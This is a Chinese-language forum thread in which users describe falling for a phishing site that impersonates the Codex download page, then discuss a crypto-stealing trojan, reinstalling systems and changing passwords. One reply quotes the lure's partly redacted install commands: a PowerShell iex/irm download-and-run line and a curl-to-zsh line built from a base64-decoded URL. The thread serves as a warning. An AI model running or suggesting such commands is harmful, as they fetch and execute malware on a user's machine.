有佬被这个网站给骗了的么

木木 2026-06-05 23:22 1

之前一直是用codex cli,今天心血来潮打算装个codex的app试试,在google一搜点进去了第一个(页面伪装的跟官网一模一样),没想到是个钓鱼网站,关键我还执行了,想问下有没有佬有碰到的,如果运行了需要重装电脑吗,要是没碰到的佬记得留个心眼


最新回复 (20)
  • Nicei 06-05 23:24
    1

    难道你平时安装东西都不看网址的吗?非官网的应用一概不安装

  • Star 06-05 23:25
    2

    看到蓝点网发了

    有网友在谷歌搜索 Codex 被恶意广告欺骗,带毒版直接窃取 2 万美元的加密货币。

    钓鱼网站使用谷歌商家域名 (business [.] google [.] com) 投放仿冒 OpenAI 的钓鱼网站,引导用户打开终端粘贴命令安装 Codex,带毒版被安装后会监视剪贴板,网友转账时复制目标地址但被替换为黑客的钱包地址。 查看详情:

  • 木木 楼主 06-05 23:25
    3

    大意了,平时一般都看得,今天糊里糊涂的点进去了

  • 玖凰 06-05 23:28
    4

    其实windows系统,oai只给了微软商店安装的途径

  • Wolke_Wolke 06-05 23:48
    5

    (帖子已被作者删除)

  • 文月 06-05 23:54
    6

    有的有的,欢迎加入受害者名单 ^-^



    因为是谷歌排最前面 点进去后看和codex官网长得一样 网页上让用mshta安装 我还想着不用恶心的微软商店了挺好 直接就把命令执行了 然后怎么没反应回过神来才发现不对劲 我在干什么 马上断网加断电 ^-^PE重装系统加全部密码换一遍
    属于是AI全yolo久了 大脑变得光滑 啥玩意都直接执行不过脑了 搞了一天真是顶级折磨啊
    谷歌罪大恶极把这种玩意排最前…



    [mmexport1780211049641]
    [mmexport1780211007547]
    [mmexport1780211003017]
    [mmexport1780210998155]
    打算玩玩codex,然后去Google下载,后面发现好像盗版网站,我被植入了病毒,但是不知道现在有什么影响,就是用火绒还有电脑自带查杀了一下,有没有大神告知一下怎么消毒隐患
    电脑打开是这个链接:С…
  • a12908 06-06 00:13
    8

    没错,帖子里就是我 ^-^运行完才发现不对劲,直接拔电断网了

    离线杀毒什么也扫不出来之前网上还搜索不到相关到消息,直接重装了把浏览器里的密码也全改一遍。 现在AI 用多了,什么都是直接运行,一点警惕都没有了。吃一堑,长一智啊

    完全不建议去搞什么杀毒,直接重装。除了重装,没有其他别的方法。 我重装刚好也把硬盘直接换成 4T 的了。现在这个时间买固态真是大出血。

  • HI,妖怪,吃俺老孙一棒 06-06 00:15
    9

    嗯?你框出来的不是google域名么?

    我搜下没问题,第一个就是官网。


  • HI,妖怪,吃俺老孙一棒 06-06 00:24
    10


    好吧。我搜了下,还有冒充claude官网的。


  • 码良 06-06 00:26
    11

    看着访问量还挺好,100 多万次

  • doudo 06-06 00:26
    12

    我看了原始贴。感觉像是博眼球,骗流量。正常被盗2万美元,不会那么轻描淡写的反应。

  • 幻之域 06-06 00:38
    13

    我在蓝点网看到过相关报告,说是剪贴板病毒,被骗2万美元的加密货币

  • Wolke_Wolke 06-06 00:44
    14

    关键我还执行了,想问下有没有佬有碰到的,如果运行了需要重装电脑吗



    叠甲:我不是专业搞网络安全的,单纯个人经验

    重装吧,说真的,我试着复现了一下,google搜索codex cli,跳转的那个google sites

    假设你的浏览器UA是win,给的是codex for win的伪装指令:

    powershell iex(irm s【中间省略】om/200.txt)

    然后你的浏览器UA是mac,给的是codex for mac的伪装指令:

    echo “Downloading Codex: https ://persistent[.]oaistatic[.]com/codex-app-prod/Codex.dmg” && curl -s $(echo “a【中间省略】Ix” | openssl base64 -d -A) | zsh


    你既然已经运行了,电脑应该已经中毒了,把密码之类的全部视为泄露,然后做紧急措施,然后重装吧…… ^-^


    以下为Claude润色版(AIGC截图发了)

  • ldGG 06-06 00:48
    15

    不是剪贴板病毒,是网络监听拦截替换交易地址的,就像十几年前的支付宝拦截马一样,监听抓包网络数据,进行拦截替换,这个木马一直在后台常驻进行实时监听

  • Muelsyse 06-06 00:50
    16

    那一天,Google 和 OpenAI 都喝醉了 ^-^

  • 幻之域 06-06 00:50
    17

    呃,实际效果看的都差不多的样子,原理不同

  • 新城队员 06-06 00:53
    18

    不是有ps脚本的一键安装方式吗,难道是假的

  • 岚冰 06-06 00:54
    19

    哇~ 这坑~ 网址还是谷歌的 (虽然是三级地址)~真的一不留神很容易被误导~ 而且访问量还那么高

  • 玖凰 06-06 00:56
    20

    这个我没见到过,不是很清楚。至少chatgpt官网下载的exe只是一个拉起微软商店,然后在微软商店下载codex的一个脚本(

  • 行思渐远 06-06 00:56
    21

    不冤枉啊,太盲目相信国外服务了,导致丧失了基本判断,直接搜索直接相信并点第一个结果^-^。


    搜索引擎付费推广是正常的商业模式,还是要提高甄别的意识

* 帖子来源Linux.do
返回